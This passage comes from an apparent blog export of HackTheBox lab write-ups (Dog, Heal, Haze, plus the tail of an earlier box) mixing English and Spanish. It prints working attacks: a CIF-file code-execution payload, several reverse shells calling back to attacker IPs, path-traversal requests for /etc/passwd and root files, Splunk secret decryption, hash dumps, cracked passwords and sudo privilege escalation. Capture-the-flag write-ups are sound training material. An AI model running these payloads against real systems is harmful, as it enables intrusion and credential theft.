().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+[\"__sub\" + \"classes__\"]) () if d.__name__ == \"BuiltinImporter\"][0].load_module (\"os\").system (\"touch pwned\");0,0,0' _space_group_magn.number_BNS 62.448 _space_group_magn.name_BNS \"P n' m a' \" ``` we run this on local machine for see if create us the pwned file empty, if create a file we have a potential command execution. ![Image](image-2.png) We add reverse shell to file cif and listening with netcat ```bash data_5yOhtAoR _audit_creation_date 2018-06-08 _audit_creation_method \"Pymatgen CIF Parser Arbitrary Code Execution Exploit\" loop_ _parent_propagation_vector.id _parent_propagation_vector.kxkykz k1 [0 0 0] _space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+[\"__sub\" + \"classes__\"]) () if d.__name__ == \"BuiltinImporter\"][0].load_module (\"os\").system (\"/bin/bash -c \\'sh -i >& /dev/tcp/10.10.14.36/4040 0>&1\\'\");0,0,0' _space_group_magn.number_BNS 62.448 _space_group_magn.name_BNS \"P n' m a' \" ``` ```bash rlwrap nc -lvnp 4040 ``` Once get the reverse shell we need to make our shell fully interactive ### TTY Treatment ```bash script /dev/null -c bash ``` ```bash stty raw -echo; fg ``` ```bash reset xterm ``` ![Image](image-3.png) ### User \"APP\" ![Image](image-4.png) We found the database file as app user, we download the .db file and open with sqlite3 ![Image](image-5.png) ### SQLITE3 ```sqlite .tables ``` ```sqlite .schema user ``` ```sqlite SELECT * FROM user; ``` ```sqlite 1|admin|2861debaf8d99436a10ed6f75a252abf 2|app|197865e46b878d9e74a0346b6d59886a 3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5 4|robert|02fcf7cfc10adc37959fb21f06c6b467 5|jobert|3dec299e06f7ed187bac06bd3b670ab2 6|carlos|9ad48828b0955513f7cf0f7f6510c8f8 7|peter|6845c17d298d95aa942127bdad2ceb9b 8|victoria|c3601ad2286a4293868ec2a4bc606ba3 9|tania|a4aa55e816205dc0389591c9f82f43bb 10|eusebio|6cad48078d0241cca9a7b322ecd073b3 11|gelacia|4af70c80b68267012ecdac9a7e916d18 12|fabian|4e5d71f53fdd2eabdbabb233113b5dc0 13|axel|9347f9724ca083b17e39555c36fd9007 14|kristel|6896ba7b11a62cacffbdaded457c6d92 15|adwad|3b2e574e9bb4d3e5b72f74864649c998 16|makarandgev777|c4ca4238a0b923820dcc509a6f75849b 17|shults|202cb962ac59075b964b07152d234b70 18|1|c4ca4238a0b923820dcc509a6f75849b 19|test|098f6bcd4621d373cade4e832627b4f6 20|'+or+1=1--|098f6bcd4621d373cade4e832627b4f6 21|test123|cc03e747a6afbbcbf8be7668acfebee5 ``` ![Image](image-6.png) We found the password for rosa ```bash unicorniosrosados ``` #### Log in with SSH ![Image](image-7.png) We gonna run the script linpeas.sh for search all the machine for any privilege scalation ![Image](image-8.png) Identifier 8080 port open, sevice running on local # Port Forwarding - kali Machine ```bash ./chisel server -p 5678 --reverse ``` ![Image](image-9.png) - rosa ```bash ./chisel client 10.10.14.36:5678 R:8080:127.0.0.1:8080 ``` ![Image](image-10.png) we identifier on headers a vulnerability for **Python/3.9 aiohttp/3.9.1** ![Image](image-11.png) ## CVE-2024-23334 - Lab setup ```bash git clone https://github.com/z3rObyte/CVE-2024-23334-PoC cd CVE-2024-23334-PoC python3 -m venv .env chmod +x ./.env/bin/activate source ./.env/bin/activate pip3 install -r requirements.txt python3 server.py ``` Exploit it! ```bash bash exploit.sh ``` As root we can see the passwd file ![Image](image-12.png) Another way for get the passwd file is with **cURL** ![Image](image-13.png) ```bash curl -s --path-as-is \"http://127.0.0.1:8080/assets/../../../../../../../etc/passwd\" ``` ```bash curl -s --path-as-is \"http://127.0.0.1:8080/assets/../../../../../../../root/root.txt\" ``` ![Image](image-14.png) If u can log in with ssh u can look the id_rsa file ![Image](image-15.png) Permission key ```bash chmod 400 id_rsa ``` log in ```bash ssh -i id_rsa root@10.10.11.38 ``` ![Image](image-16.png)"},{"id":"dog","title":"HTB - Dog","description":"HTB - Dog","date":"2025-02-02T00:00:00.000Z","tags":["HackTheBox","Backdrop","CMS","RCE","Webshell","sudoers","infomration-disclosure","information-leakage"],"authors":["r4cc0x"],"url":"/blog/dog","content":"## Box Info | Name | Dog | | :-------------------- | ---------------: | | Release Date | 08 Mar, 2025 | | OS | Linux | | Rated Difficulty | Easy | ## Enumeration ```bash sudo nmap -p- --open --min-rate 5000 -n -vvv -Pn 10.10.11.58 -oG allPorts ``` ```bash Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-12 23:07 EDT Initiating SYN Stealth Scan at 23:07 Scanning 10.10.11.58 [65535 ports] Discovered open port 22/tcp on 10.10.11.58 Discovered open port 80/tcp on 10.10.11.58 Completed SYN Stealth Scan at 23:07, 20.94s elapsed (65535 total ports) Nmap scan report for 10.10.11.58 Host is up, received user-set (0.13s latency). Scanned at 2025-03-12 23:07:13 EDT for 21s Not shown: 50700 closed tcp ports (reset), 14833 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 ``` ```nmap -p 22,80 -sCV 10.10.11.58 -oN targeted``` ```bash Host is up (0.061s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA) | 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA) |_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-git: | 10.10.11.58:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: todo: customize url aliases. reference:https://docs.backdro... |_http-title: Home | Dog |_http-generator: Backdrop CMS 1 (https://backdropcms.org) | http-robots.txt: 22 disallowed entries (15 shown) | /core/ /profiles/ /README.md /web.config /admin | /comment/reply /filter/tips /node/add /search /user/register |_/user/password /user/login /user/logout /?q=admin /?q=comment/reply |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Whatweb ```r http://10.10.11.58 [200 OK] Apache[2.4.41], Content-Language[en], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.58], UncommonHeaders[x-backdrop-cache,x-generator], X-Frame-Options[SAMEORIGIN] ``` ## CMS - Backdrop En la web encontramos CMS Backdrop un **Content Management System** y es importante a la hora de enumerar, encontrar su version para verificar si es vulnerable a algun exploit. ![Image](image.png) `tiffany@dog.htb` ![Image](image-1.png) Primer usuario encontrado. ### Information Disclosure Dirsearch ```bash [23:20:48] 301 - 309B - /.git -> http://10.10.11.58/.git/ [23:20:48] 200 - 455B - /.git/info/ [23:20:48] 200 - 240B - /.git/info/exclude [23:20:48] 200 - 476B - /.git/logs/ [23:20:48] 301 - 319B - /.git/logs/refs -> http://10.10.11.58/.git/logs/refs/ [23:20:48] 301 - 325B - /.git/logs/refs/heads -> http://10.10.11.58/.git/logs/refs/heads/ [23:20:48] 200 - 230B - /.git/logs/refs/heads/master [23:20:49] 200 - 337KB - /.git/index [23:20:49] 200 - 2KB - /.git/objects/ [23:20:49] 200 - 461B - /.git/refs/ [23:20:49] 200 - 41B - /.git/refs/heads/master [23:20:49] 301 - 319B - /.git/refs/tags -> http://10.10.11.58/.git/refs/tags/ [23:20:52] 403 - 276B - /.ht_wsr.txt [23:20:52] 403 - 276B - /.htaccess.bak1 [23:20:52] 403 - 276B - /.htaccess.orig [23:20:52] 403 - 276B - /.htaccess.sample [23:20:52] 403 - 276B - /.htaccess.save [23:20:52] 403 - 276B - /.htaccess_extra [23:20:52] 403 - 276B - /.htaccess_orig [23:20:52] 403 - 276B - /.htaccess_sc [23:20:52] 403 - 276B - /.htaccessOLD [23:20:52] 403 - 276B - /.htaccessBAK [23:20:52] 403 - 276B - /.htaccessOLD2 [23:20:52] 403 - 276B - /.htm [23:20:52] 403 - 276B - /.html [23:20:53] 403 - 276B - /.htpasswd_test [23:20:53] 403 - 276B - /.htpasswds [23:20:53] 403 - 276B - /.httr-oauth [23:21:07] 403 - 276B - /.php [23:21:57] 301 - 309B - /core -> http://10.10.11.58/core/ [23:22:23] 301 - 310B - /files -> http://10.10.11.58/files/ [23:22:24] 200 - 586B - /files/ [23:22:41] 200 - 4KB - /index.php [23:22:42] 404 - 2KB - /index.php/login/ [23:22:52] 200 - 456B - /layouts/ [23:22:53] 200 - 7KB - /LICENSE.txt [23:23:07] 301 - 312B - /modules -> http://10.10.11.58/modules/ [23:23:07] 200 - 399B - /modules/ [23:23:43] 200 - 5KB - /README.md [23:23:54] 200 - 528B - /robots.txt [23:24:02] 403 - 276B - /server-status/ [23:24:02] 403 - 276B - /server-status [23:24:04] 200 - 0B - /settings.php [23:24:12] 301 - 310B - /sites -> http://10.10.11.58/sites/ [23:24:24] 301 - 311B - /themes -> http://10.10.11.58/themes/ [23:24:24] 200 - 454B - /themes/ ``` Encontramos la version de backdrop [Backdrop - version](https://docs.backdropcms.org/api/backdrop/files?object_name=&summary=&page=1) usaremos ``git-dumper`` para obtener todos los archivos de la ruta /.git/ desde la web que obtuvimos haciendo un escaneo de directorios. ```bash tree . -all | grep \"backdrop\" | find . -name \"backdrop_system_listing_compatible_test.info\" ``` `cat ./core/modules/simpletest/tests/backdrop_system_listing_compatible_test/backdrop_system_listing_compatible_test.info` ![Image](image-2.png) ```bash version = 1.27.1 ``` ### Information Leakage Posibles contraseñas ![Image](image-3.png) Credenciales que posiblemente sean para la web ```r tiffany BackDropJ2024DS2024 ``` ![Image](image-4.png) Una vez logeados, nuevamente se expone la version con esto ya confirmamos. ![Image](image-5.png) Tenemos un listado de usuarios ![Image](image-6.png) ``` tiffany rosa axel morris john dogBackDropSystem jobert jPAdminB ``` ## Backdrops CMS - RCE [Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) ](https://www.exploit-db.com/exploits/52021) ![Image](image-7.png) ![Image](image-8.png) Una vez que subimos el archivo y ejecutemos no funcionara, probablemente necesitemos subirlo manual ![Image](image-9.png) ![Image](image-10.png) `http://10.10.11.58//modules/shell/shell.php?cmd=` ![Image](image-11.png) ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.33 4444 >/tmp/f ``` ![Image](image-12.png) ``` script /dev/null -c bash export TERM=xterm Ctrl + z stty raw -echo;fg reset xterm ``` ## Privilege Escalation ### Abusing sudoers ![Image](image-13.png) sudo -l ![Image](image-14.png) ``bee`` una utilidad de línea de comandos para el sistema de gestión de contenidos Backdrop CMS`. ``bee -h`` ![Image](image-15.png) ```bash sudo /usr/local/bin/bee eval \"shell_exec('bash');\" ``` ![Image](image-16.png) Al ejecutar comandos no aparece nada. ![Image](image-17.png) Cambiaremos la funcion por otro para poder ver el output al ejecutar comandos. ```bash sudo /usr/local/bin/bee eval \"system('/bin/bash');\" ``` Pwned"},{"id":"heal","title":"HTB - Heal","description":"HTB - Heal","date":"2025-02-02T00:00:00.000Z","tags":["HackTheBox","Directory Traversal","cracking","RCE","CVE-2021-44967","Hashicorp Consul v1.0"],"authors":["r4cc0x"],"url":"/blog/heal","content":"## Box Info | Name | Heal | | :-------------------- | ---------------: | | Release Date | 14 Dec, 2024 | | OS | Linux | | Rated Difficulty | Medium | ## Enumeration ```bash sudo nmap -p- --open --min-rate 5000 -n -vvv -Pn 10.10.11.46 -oG allPorts ``` ```bash nmap -p 80,22 -sCV 10.10.11.46 -oN targeted ``` ```bash PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA) |_ 256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://heal.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ```bash echo \"10.10.11.46 heal.htb\" | sudo tee -a /etc/hosts ``` ```bash dirb http://heal.htb ``` ![Image](image.png) Intercept with BurpSuite the resquest when log in ![Image](image-1.png) **API** as subdomain - Run wfuzz for confirm ```zsh wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302,301 -H \"Host: FUZZ.heal.htb\" -u http://heal.htb/ -t 100 ``` ![Image](image-2.png) Adding to the hosts file ![Image](image-3.png) But there's nothing, we go back to register. Now, after registering, we can log in. We found a section call Take The Survey and redirect us to another subdomain ![Image](image-4.png) - ralph is administrator ![Image](image-5.png) ### Scan Directory ```zsh gobuster dir -u http://take-survey.heal.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt ``` ```r /docs (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/docs/] /themes (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/themes/] /modules (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/modules/] /admin (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/admin/] /assets (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/assets/] /upload (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/upload/] /plugins (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/plugins/] /vendor (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/vendor/] /application (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/application/] /restaurants (Status: 500) [Size: 45] /surveys (Status: 200) [Size: 75816] /editor (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/editor/] /tmp (Status: 301) [Size: 178] [--> http://take-survey.heal.htb/tmp/] /LICENSE (Status: 200) [Size: 49474] /rest (Status: 500) [Size: 45] ``` - Version of LimeSurvey https://github.com/LimeSurvey/LimeSurvey/tree/master/docs ```zsh http://take-survey.heal.htb/docs/release_notes.txt ``` ![Image](image-6.png) we found panel administrator, now we know ralph is administrator Resume Builder (The app give us a pdf with the resume) When intercept the download we can see query parameter \"filename\" ![Image](image-7.png) ## Path Traversal ```zsh GET /download?filename=../../../../etc/passwd HTTP/1.1 ``` We found a potential PT when the request is GET, we can change the file pdf as /etc/passwd ![Image](image-8.png) ### Users ```zsh ralph ron www-data ``` api.heal.htb its from ruby on rails so we need to found the config file ![Image](image-9.png) ![Image](image-10.png) Now we looking the config file trought Path Traversal and open the pdf file ![Image](image-11.png) ``../../development.sqlite3` we need to change to .sqlite3 extension and open it ![Image](image-12.png) `mv 0bdcc2fb3.pdf database.db` ```sql sqlite3 database.db ``` ```sql .tables ``` ![Image](image-13.png) ```sql SELECT * FROM users; ``` ``` ralph@heal.htb|$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG elliot@test.com|$2a$12$HYWjZkQcKOvLLtpqmK3BU..XttEbPOq5vd4M/IqmknFvRZ12HjLju fake_email@g.com|$2a$12$L3v4SYklWOJt6ew1ThCkfOzyOzNUaWFxSHYktaCNsDrAO45syQRtK da@da.ce|$2a$12$1bbrSpCjqnZ6A16epkujj.vgQ0UotDdzAYYHVg3dKCzaiH1aGkVeK test@test.com|$2a$12$HQJ64SJrpZXWPecdgAg.GuvXiaaW2oUztUtUUaxZjpsxDYZwD1Jmu0 test1@test.com|$2a$12$cPJz41IVeH57DPuZ6BlhlOu.I2vfAlMiLq3QEUL1JXlF9myD0cyJS ``` ```zsh john hash -w=/usr/share/wordlists/rockyou.txt ``` ![Image](image-14.png) Creds: ralph 147258369 Log In on take-survey.heal.htb ![Image](image-15.png) Once log in, we can run the CVE-2021-44967 (RCE) https://github.com/TheRedP4nther/limesurvey-6.6.4-authenticated-rce This rce affect to lime survey 6.6.4, just follow the installation and usage Edit config.xml: Plugin configuration file. revshell.php: Reverse shell payload. Upload the rev.zip file and activate ![Image](image-16.png) You can see if the zip load correct and activate correct ![Image](image-17.png) ``` rlwrap nc -lvnp 443 ``` ```zsh python3 limesurvey_rce.py -t http://take-survey.heal.htb/ -u ralph -p 147258369 ``` ![Image](image-18.png) ```zsh sh -c /bin/sh -i ``` `cat /var/www/limesurvey/application/config/config.php` ``` db_user AdmiDi0_pA$$w0rd ``` ![Image](image-19.png) `ser=db_user;password=AdmiDi0_pA$$w0rd;dbname=survey` - PostgreSQL *Environment variable that PostgreSQL recognizes to temporarily provide the password* ```sql PGPASSWORD='AdmiDi0_pA$$w0rd psql' -U db_user survey -h localhost ``` but therers nothing with do, so we again to look ```zsh netstat -nlp ``` ![Image](image-20.png) I use curl for look if theres a website ``` curl -X GET \"http://localhost:5800/\" ``` Redirect to **/ui/** ![Image](image-21.png) ``` curl -X GET \"http://localhost:5800/ui/\" ``` ![Image](image-22.png) *google it as consul 1.19.2 exploit* ![Image](image-23.png) ```zsh curl -X GET http://localhost:8500/ui/ | grep \"Consul\" ``` ![Image](image-24.png) ## Remote Command Execution https://www.exploit-db.com/exploits/51117 I supported with deepseek AI for generate a cURL command with json format ![Image](image-25.png) and modify some parameters ```bash curl -X PUT -d '{ \"ID\": \"rc\", \"Name\": \"Remote code execution\", \"Shell\": \"/bin/bash\", \"Interval\": \"5s\", \"Args\": [ \"python3\", \"-c\", \"import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\\\"10.10.15.14\\\", 4444)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.Popen([\\\"/bin/sh\\\", \\\"-i\\\"])\" ] }' http://localhost:8500/v1/agent/check/register ``` ![Image](image-26.png) run it and rooted ![Image](image-27.png)"},{"id":"haze","title":"HTB - Haze","description":"HTB - Haze","date":"2025-02-02T00:00:00.000Z","tags":["HackTheBox","splunk","CVE-2024-36991","path traversal","cracking","brute force","password spraying","bloodhound","DACL","sMSADumper","shadow credential","Godpotato","information leakage"],"authors":["r4cc0x"],"url":"/blog/haze","content":"## Box Info | Name | Haze | | :-------------------- | ---------------: | | Release Date | 29 Mar, 2025 | | OS | Windows | | Rated Difficulty | Hard | TTL 127 = Maquina Windows ```zsh ping -c 3 10.10.11.61 PING 10.10.11.61 (10.10.11.61) 56(84) bytes of data. 64 bytes from 10.10.11.61: icmp_seq=1 ttl=127 time=55.9 ms 64 bytes from 10.10.11.61: icmp_seq=2 ttl=127 time=59.4 ms 64 bytes from 10.10.11.61: icmp_seq=3 ttl=127 time=56.9 ms ``` ## Enumeration ```bash nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,8000,8088,8089,9389,47001,49664,49665,49666,49667,49669,58301,58308,58309,58311,58321,58338,58341,58409 10.10.11.61 -oN targeted Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 02:12 CST Nmap scan report for 10.10.11.61 Host is up (0.057s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-28 09:32:01Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=dc01.haze.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:dc01.haze.htb | Not valid before: 2025-03-05T07:12:20 |_Not valid after: 2026-03-05T07:12:20 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc01.haze.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:dc01.haze.htb | Not valid before: 2025-03-05T07:12:20 |_Not valid after: 2026-03-05T07:12:20 |_ssl-date: TLS randomness does not represent time 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=dc01.haze.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:dc01.haze.htb | Not valid before: 2025-03-05T07:12:20 |_Not valid after: 2026-03-05T07:12:20 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc01.haze.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:dc01.haze.htb | Not valid before: 2025-03-05T07:12:20 |_Not valid after: 2026-03-05T07:12:20 |_ssl-date: TLS randomness does not represent time 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 8000/tcp open http Splunkd httpd |_http-server-header: Splunkd | http-robots.txt: 1 disallowed entry |_/ | http-title: Site doesnt have a title (text/html; charset=UTF-8). |_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F 8088/tcp open ssl/http Splunkd httpd |_http-title: 404 Not Found |_http-server-header: Splunkd | http-robots.txt: 1 disallowed entry |_/ | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Not valid before: 2025-03-05T07:29:08 |_Not valid after: 2028-03-04T07:29:08 8089/tcp open ssl/http Splunkd httpd |_http-server-header: Splunkd | http-robots.txt: 1 disallowed entry |_/ |_http-title: splunkd | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Not valid before: 2025-03-05T07:29:08 |_Not valid after: 2028-03-04T07:29:08 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 58301/tcp open msrpc Microsoft Windows RPC 58308/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 58309/tcp open msrpc Microsoft Windows RPC 58311/tcp open msrpc Microsoft Windows RPC 58321/tcp open msrpc Microsoft Windows RPC 58338/tcp open msrpc Microsoft Windows RPC 58341/tcp open msrpc Microsoft Windows RPC 58409/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: 1h19m44s | smb2-time: | date: 2025-05-28T09:33:03 |_ start_date: N/A ``` ```zsh echo \"10.10.11.61 haze.htb\" | sudo tee -a /etc/hosts ``` ![Image](image.png) - whatweb ![Image](image-1.png) ```zsh 8089/tcp open ssl/http Splunkd httpd ``` Podemos ver que el puerto 8089 nos muestra la version de splunkd. ![Image](image-2.png) ## Path Traversal | Splunk 9.2.1 [critical-splunk-vulnerability-cve-2024-36991 - arbitrary file reads](https://www.sonicwall.com/blog/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-reads) ![Image](image-3.png) Encontramos un script que explota esta vulnerabilidad . [Github - CVE-2024-36991](https://github.com/bigb0x/CVE-2024-36991) ```zsh python3 CVE-2024-36991.py -u http://haze.htb:8000/ ``` ![Image](image-4.png) ``` admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152 :edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152 :mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152 :paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152 ``` Ninguno de estos hashes es posible romperlos, pero al menos tenemos usuarios ```zsh Mark paul Edward ``` En el articulo menciona un path traversal manual interceptando un peticion \"``GET /en-US/modules/messaging/``\". ![Image](image-5.png) - BurpSuite ![Image](image-6.png) Intente leer el archivo /etc/passwd pero no mostró nada, como yo no se que archivos maneje splunk, investigue su documentacion para leer archivos, como ``.conf`` Encontramos la ruta donde los archivos config se almacenan [Configuration file directories](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/9.4/administer-splunk-enterprise-with-configuration-files/configuration-file-directories) ``` $SPLUNK_HOME/etc/system/local ``` Una lista de archivos config que pueden encontrarse en la ruta [List of configuration files](https://help.splunk.com/en/splunk-enterprise/administer/admin-manual/9.4/administer-splunk-enterprise-with-configuration-files/list-of-configuration-files) | File | Purpose | | ------------------- | ---------------------------------------------------------------------------- | | authentication.conf | Toggle between Splunk's built-in authentication or LDAP, and configure LDAP. | ![Image](image-7.png) Este es un archivo de autenticacion de splunk relacionado con la autenticacion LDAP ```zsh [splunk_auth] minPasswordLength = 8 minPasswordUppercase = 0 minPasswordLowercase = 0 minPasswordSpecial = 0 minPasswordDigit = 0 [Haze LDAP Auth] SSLEnabled = 0 anonymous_referrals = 1 bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY= charset = utf8 emailAttribute = mail enableRangeRetrieval = 0 groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb groupMappingAttribute = dn groupMemberAttribute = member groupNameAttribute = cn host = dc01.haze.htb nestedGroups = 0 network_timeout = 20 pagelimit = -1 port = 389 realNameAttribute = cn sizelimit = 1000 timelimit = 15 userBaseDN = CN=Users,DC=haze,DC=htb userNameAttribute = samaccountname [authentication] authSettings = Haze LDAP Auth authType = LDAP ``` Como el hash no es crackeable, buscando por su sigla `bindDNpassword` encontra un articulo [LDAP-bind-password-in-authentication](https://community.splunk.com/t5/Security/LDAP-bind-password-in-authentication-conf-not-portable-across/m-p/16368) ![Image](image-8.png) Este archivo `splunk.secret` es un archivo que contiene una clave maestra que splunk usa para cifrar y descifrar credenciales, su ubicacion tipi es la que se menciona. ```zsh GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret ``` ![Image](image-9.png) ## Cracking Hash Secret Existe un script que descifra la password. [splunksecrets](https://github.com/HurricaneLabs/splunksecrets.git) ```secret $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY= ``` ```zsh splunksecrets splunk-decrypt -S secret ``` ![Image](image-10.png) En Active Directory es muy común que los usuarios tengan una estructura en sus nombres como p.taylor o paultaylor o paul.taylor, con esto podemos crearnos un archivo para validar que nombre es el que se encuentra en el dominio. ```zsh nxc smb 10.10.11.61 -u user -p 'Ld@p_Auth_Sp1unk@2k24' ``` ```c paul.taylor:Ld@p_Auth_Sp1unk@2k24 ``` Validamos las credenciales ```zsh netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success ``` ![Image](image-11.png) Listamos los archivos compartidos que puede leer/ver paul.taylor ```zsh netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --shares ``` ![Image](image-12.png) Con smbmap veremos todos los archivos de cada carpeta (si lo hay) en bruto para de esa forma ver mas facil cada uno de ellos. ```zsh smbmap -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' -H 10.10.11.61 -r SYSVOL --depth 10 ``` ![Image](image-13.png) ## Enumeration Users Enumeramos usuarios que paul.taylor puede ver, sin embargo paul.taylor y esto es muy común en AD que algunos usuarios tenga restricciones al ver a otros usuarios. ```zsh rpcclient -U 'paul.taylor%Ld@p_Auth_Sp1unk@2k24' 10.10.11.61 -c 'enumdomusers' | grep -oP '\\[.*?\\]' | grep -v \"0x\" | tr -d '[]' ``` ![Image](image-14.png) Con rpcclient tambien podemos ver descripciones, algunas veces se puede encontrar cosas interesantes en esa parte. ```zsh rpcclient -U 'paul.taylor%Ld@p_Auth_Sp1unk@2k24' 10.10.11.61 -c 'querydispinfo' index: 0xfe6 RID: 0x44f acb: 0x00000210 Account: paul.taylor Name: (null) Desc: (null) ``` #### Enum Users via SMB Brute Force Otro metodo para listar usuarios es usando Brute Force con smb, en tal caso de que uno no funcione. ```zsh sudo netexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep SidTypeUser ``` ![Image](image-15.png) ```Users DC01$ paul.taylor mark.adams edward.martin 